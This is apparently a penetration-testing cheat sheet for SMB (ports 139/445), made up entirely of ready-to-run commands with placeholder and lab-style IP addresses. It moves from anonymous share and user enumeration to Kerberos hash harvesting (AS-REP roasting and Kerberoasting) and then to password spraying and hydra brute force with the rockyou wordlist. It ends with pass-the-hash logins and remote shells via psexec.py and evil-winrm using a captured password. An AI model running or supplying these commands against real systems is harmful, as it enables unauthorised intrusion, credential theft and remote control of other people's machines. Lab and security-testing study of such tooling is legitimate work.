# Port 139/445 - SMB

With No Creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    crackmapexec smb {IP}
    crackmapexec smb {IP} --pass-pol -u "" -p ""
    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    getArch.py -target {IP}

With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP}
    smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP} --pw-nt-hash `hash`
    crackmapexec smb {IP} -u {Username} -p {Password} --shares
    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

enum4linux -a 10.10.10.x

ls /usr/share/nmap/scripts/ | grep smb | grep vuln
sudo nmap --script smb-vuln* -p 139,445 10.10.10.x
sudo nmap --script=smb-check-vulns.nse <targetip> -p445

smbclient -L 10.10.10.x
smbmap -H 10.10.10.x
smbmap -H 10.10.10.x -u anonymous
crackmapexec smb 10.10.10.x --shares -u '' -p ''

smbmap -H 10.10.10.x -u anonymous -r --depth 5
smbmap -H 10.10.10.182 -u s.smith -p myp4ss -r --depth 5

mount -t cifs //10.10.10.x/Backups /mnt/smb

smbclient //10.10.10.x/ -U
smbclient //10.10.10.x/[SHARE] -U ''

crackmapexec smb 10.10.10.x --pass-pol

crackmapexec smb 10.10.10.172 -u users.txt -p /usr/share/wordlists/rockyou.txt
hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

smbget -R smb://192.168.100.120/Office

crackmapexec winrm 192.168.100.55 -u /home/kali/users.txt -p 'secretpassword'
# Got pwned? Use PSEXEC or WINRM to login!

# PSEXEC
sudo python2 psexec.py megacorp.org/bob:'secretpassword'@192.168.100.55

# WinRM
evil-winrm -i 192.168.100.55 -u bob -p 'secretpassword'